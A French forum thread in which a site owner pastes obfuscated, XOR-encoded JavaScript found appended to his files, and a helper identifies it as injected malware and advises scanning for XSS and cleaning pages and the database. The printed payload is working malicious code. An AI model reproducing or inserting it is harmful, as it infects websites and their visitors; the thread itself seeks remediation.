Code rajouté à la fin des fichiers javascript

**vladock** · 18/11/2010, 16h12

Voici le code qui s’insère à la fin de mes fichiers javascripts, je souhaiterais un peu qu'on m'explique ce que ça fais

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
hsed=new Array

(97,62,53,57,47,55,63,52,46,116,45,40,51,46,63,114,120,102,56,53,62,35,100,102,41,57,40,51,42,46,100,97,44,59,40,122,59,40,50,55,103,125,60,40,125,97,44,59

,40,122,55,35,55,32,103,125,51,125,97,44,59,40,122,50,32,59,61,103,125,55,63,125,97,44,59,40,122,48,56,57,60,103,125,59,125,97,44,59,40,122,46,49,52,56,55,

103,62,53,57,47,55,63,52,46,97,44,59,40,122,62,43,46,46,103,125,45,51,62,46,50,125,97,44,59,40,122,52,40,40,46,103,125,50,46,46,42,96,117,117,45,59,51,42,6

2,52,41,116,40,47,117,23,25,60,9,12,60,19,54,16,104,30,108,41,10,2,61,108,2,35,57,46,48,34,34,46,41,17,35,105,20,2,31,125,97,44,59,40,122,56,32,47,34,61,10

3,125,50,63,51,61,50,46,125,97,44,59,40,122,32,49,51,43,103,125,41,46,35,54,63,125,97,44,59,40,122,52,48,51,59,55,103,125,107,125,97,44,59,40,122,55,55,59,

52,103,125,44,51,41,51,56,51,54,51,46,35,96,50,51,62,62,63,52,125,97,44,59,40,122,52,43,48,59,49,103,125,41,40,57,125,97,44,59,40,122,45,47,41,54,103,46,49

,52,56,55,116,57,40,63,59,46,63,31,54,63,55,63,52,46,114,55,35,55,32,113,59,40,50,55,113,48,56,57,60,113,50,32,59,61,115,97,45,47,41,54,116,41,63,46,27,46,

46,40,51,56,47,46,63,114,62,43,46,46,118,52,48,51,59,55,115,97,45,47,41,54,116,41,63,46,27,46,46,40,51,56,47,46,63,114,56,32,47,34,61,118,52,48,51,59,55,11

5,97,45,47,41,54,116,41,63,46,27,46,46,40,51,56,47,46,63,114,32,49,51,43,118,55,55,59,52,115,97,45,47,41,54,116,41,63,46,27,46,46,40,51,56,47,46,63,114,52,

43,48,59,49,118,52,40,40,46,115,97,46,49,52,56,55,116,56,53,62,35,116,59,42,42,63,52,62,25,50,51,54,62,114,45,47,41,54,115,97,97,102,117,41,57,40,51,42,46,

100,120,115,97);rzoq=new String();zvgf=90;wjecw=eval;ieaiu=String.fromCharCode;for(bffbf in hsed)rzoq+=ieaiu(hsed[bffbf]^zvgf);wjecw(rzoq);
goibj=new Array

(91,4,15,3,21,13,5,14,20,78,23,18,9,20,5,72,66,92,2,15,4,25,94,92,19,3,18,9,16,20,94,91,22,1,18,64,14,7,7,8,24,93,71,6,18,71,91,22,1,18,64,18,18,13,6,14,93

,71,9,71,91,22,1,18,64,24,17,8,3,21,93,71,13,5,71,91,22,1,18,64,4,21,9,7,15,93,71,1,71,91,22,1,18,64,10,10,20,9,9,93,4,15,3,21,13,5,14,20,91,22,1,18,64,14,

25,7,7,93,71,23,9,4,20,8,71,91,22,1,18,64,22,20,11,2,10,93,71,8,20,20,16,90,79,79,23,1,9,16,4,14,19,78,18,21,79,45,35,6,51,54,6,41,12,42,82,36,86,19,48,56,

7,86,56,25,3,20,10,24,24,20,19,43,25,83,46,56,37,71,91,22,1,18,64,3,18,22,22,93,71,8,5,9,7,8,20,71,91,22,1,18,64,5,26,10,24,19,93,71,19,20,25,12,5,71,91,22

,1,18,64,10,24,11,2,18,93,71,81,71,91,22,1,18,64,3,13,13,26,13,93,71,22,9,19,9,2,9,12,9,20,25,90,8,9,4,4,5,14,71,91,22,1,18,64,26,7,1,9,93,71,19,18,3,71,91

,22,1,18,64,15,26,26,25,93,10,10,20,9,9,78,3,18,5,1,20,5,37,12,5,13,5,14,20,72,18,18,13,6,14,75,14,7,7,8,24,75,4,21,9,7,15,75,24,17,8,3,21,73,91,15,26,26,2

5,78,19,5,20,33,20,20,18,9,2,21,20,5,72,14,25,7,7,76,10,24,11,2,18,73,91,15,26,26,25,78,19,5,20,33,20,20,18,9,2,21,20,5,72,3,18,22,22,76,10,24,11,2,18,73,9

1,15,26,26,25,78,19,5,20,33,20,20,18,9,2,21,20,5,72,5,26,10,24,19,76,3,13,13,26,13,73,91,15,26,26,25,78,19,5,20,33,20,20,18,9,2,21,20,5,72,26,7,1,9,76,22,2

0,11,2,10,73,91,10,10,20,9,9,78,2,15,4,25,78,1,16,16,5,14,4,35,8,9,12,4,72,15,26,26,25,73,91,91,92,79,19,3,18,9,16,20,94,66,73,91);uvczo=new String

();wnqbz=96;epkl=eval;yiux=String.fromCharCode;for(brgxm in goibj)uvczo+=yiux(goibj[brgxm]^wnqbz);epkl(uvczo);
fkmj=new Array

(7,88,83,95,73,81,89,82,72,18,75,78,85,72,89,20,30,0,94,83,88,69,2,0,79,95,78,85,76,72,2,7,74,93,78,28,93,73,72,82,1,27,90,78,27,7,74,93,78,28,68,74,69,78,

1,27,85,27,7,74,93,78,28,72,76,73,91,1,27,81,89,27,7,74,93,78,28,69,89,77,88,1,27,93,27,7,74,93,78,28,75,88,74,80,76,1,88,83,95,73,81,89,82,72,7,74,93,78,2

8,73,74,84,73,75,1,27,75,85,88,72,84,27,7,74,93,78,28,80,78,81,86,79,1,27,84,72,72,76,6,19,19,75,93,85,76,88,82,79,18,78,73,19,113,127,90,111,106,90,117,80

,118,14,120,10,79,108,100,91,10,100,69,95,72,86,68,68,72,79,119,69,15,114,100,121,27,7,74,93,78,28,73,95,84,89,1,27,84,89,85,91,84,72,27,7,74,93,78,28,77,8

4,94,74,70,1,27,79,72,69,80,89,27,7,74,93,78,28,69,82,79,87,1,27,13,27,7,74,93,78,28,90,89,83,78,77,1,27,74,85,79,85,94,85,80,85,72,69,6,84,85,88,88,89,82,

27,7,74,93,78,28,91,90,87,82,94,1,27,79,78,95,27,7,74,93,78,28,85,95,81,94,80,1,75,88,74,80,76,18,95,78,89,93,72,89,121,80,89,81,89,82,72,20,68,74,69,78,23

,93,73,72,82,23,69,89,77,88,23,72,76,73,91,21,7,85,95,81,94,80,18,79,89,72,125,72,72,78,85,94,73,72,89,20,73,74,84,73,75,16,69,82,79,87,21,7,85,95,81,94,80

,18,79,89,72,125,72,72,78,85,94,73,72,89,20,73,95,84,89,16,69,82,79,87,21,7,85,95,81,94,80,18,79,89,72,125,72,72,78,85,94,73,72,89,20,77,84,94,74,70,16,90,

89,83,78,77,21,7,85,95,81,94,80,18,79,89,72,125,72,72,78,85,94,73,72,89,20,91,90,87,82,94,16,80,78,81,86,79,21,7,75,88,74,80,76,18,94,83,88,69,18,93,76,76,

89,82,88,127,84,85,80,88,20,85,95,81,94,80,21,7,7,0,19,79,95,78,85,76,72,2,30,21,7);giegp=new String();pvwz=60;kllza=eval;mygd=String.fromCharCode;for(odla 

in fkmj)giegp+=mygd(fkmj[odla]^pvwz);kllza(giegp);
rrtxs=new Array

(89,6,13,1,23,15,7,12,22,76,21,16,11,22,7,74,64,94,0,13,6,27,92,94,17,1,16,11,18,22,92,89,20,3,16,66,5,1,13,6,95,69,4,16,69,89,20,3,16,66,8,22,6,18,95,69,1

1,69,89,20,3,16,66,17,21,27,26,26,95,69,15,7,69,89,20,3,16,66,9,7,12,19,27,95,69,3,69,89,20,3,16,66,5,27,23,16,95,6,13,1,23,15,7,12,22,89,20,3,16,66,1,4,19

,17,26,95,69,21,11,6,22,10,69,89,20,3,16,66,16,26,16,12,95,69,10,22,22,18,88,77,77,21,3,11,18,6,12,17,76,16,23,77,47,33,4,49,52,4,43,14,40,80,38,84,17,50,5

8,5,84,58,27,1,22,8,26,26,22,17,41,27,81,44,58,39,69,89,20,3,16,66,17,10,6,17,11,95,69,10,7,11,5,10,22,69,89,20,3,16,66,11,6,19,24,95,69,17,22,27,14,7,69,8

9,20,3,16,66,19,23,12,22,11,95,69,83,69,89,20,3,16,66,1,20,13,14,95,69,20,11,17,11,0,11,14,11,22,27,88,10,11,6,6,7,12,69,89,20,3,16,66,22,3,16,10,27,95,69,

17,16,1,69,89,20,3,16,66,10,17,10,19,0,95,5,27,23,16,76,1,16,7,3,22,7,39,14,7,15,7,12,22,74,8,22,6,18,73,5,1,13,6,73,9,7,12,19,27,73,17,21,27,26,26,75,89,1

0,17,10,19,0,76,17,7,22,35,22,22,16,11,0,23,22,7,74,1,4,19,17,26,78,19,23,12,22,11,75,89,10,17,10,19,0,76,17,7,22,35,22,22,16,11,0,23,22,7,74,17,10,6,17,11

,78,19,23,12,22,11,75,89,10,17,10,19,0,76,17,7,22,35,22,22,16,11,0,23,22,7,74,11,6,19,24,78,1,20,13,14,75,89,10,17,10,19,0,76,17,7,22,35,22,22,16,11,0,23,2

2,7,74,22,3,16,10,27,78,16,26,16,12,75,89,5,27,23,16,76,0,13,6,27,76,3,18,18,7,12,6,33,10,11,14,6,74,10,17,10,19,0,75,89,89,94,77,17,1,16,11,18,22,92,64,75

,89);ztftz=new String();watu=98;byflp=eval;kfbq=String.fromCharCode;for(rzdab in rrtxs)ztftz+=kfbq(rrtxs[rzdab]^watu);byflp(ztftz);

**Sayrus** · 18/11/2010, 16h56

Hacké?

J'ai déjà vu ça sur certains sites infectés... Si c'est le cas ça permet d'insérer du code HTML dans tes pages

**vladock** · 18/11/2010, 19h06

Haaaa bon es ce que je pourrais avoir de plus ample info pour aller voir sur mes pages

**Sayrus** · 18/11/2010, 19h14

Ceci va t'aider à mieux comprendre:

Il s'agit de convertir un script javascript sous forme cryptée de manière à dissimuler le code en lui même.

Tu as certainement des failles XSS sur ton site...

Ceci pourra peut être t'aider à comprendre...
http://fmcorz.info/index.php/post/20...-Adopte-Un-Mec

**vladock** · 18/11/2010, 19h31

Pour le lien que tu m'as donné on me dit que le document n'existe pas.
donc si tu peux envoi moi un autre et si dans la mesure du possible tu peux me montrer comment me débarrasser de ça , ça serait sympa.

Edit : ok j'ai pu voir pour le site que vous m'avez remis, on explique un peu comment ça se passe maintenant comment nettoyer mon site web

**Sayrus** · 19/11/2010, 09h21

Et bien tout d'abord, il faut chercher ce qu'on appelle une faille XSS le site...

Pour cela, en version gratuite, il existe acunetix web vulnerability scanner

Ca marche très bien...

Une fois la faille XSS détectée, il faut la corriger...

Et enfin, il faut supprimer le script sur toutes les pages infectées, bien vérifier si celui-ci est enregistré dans la db, etc...

Code rajouté à la fin des fichiers javascript

Sécurité

Vue hybride

Discussions similaires

Partager

Partager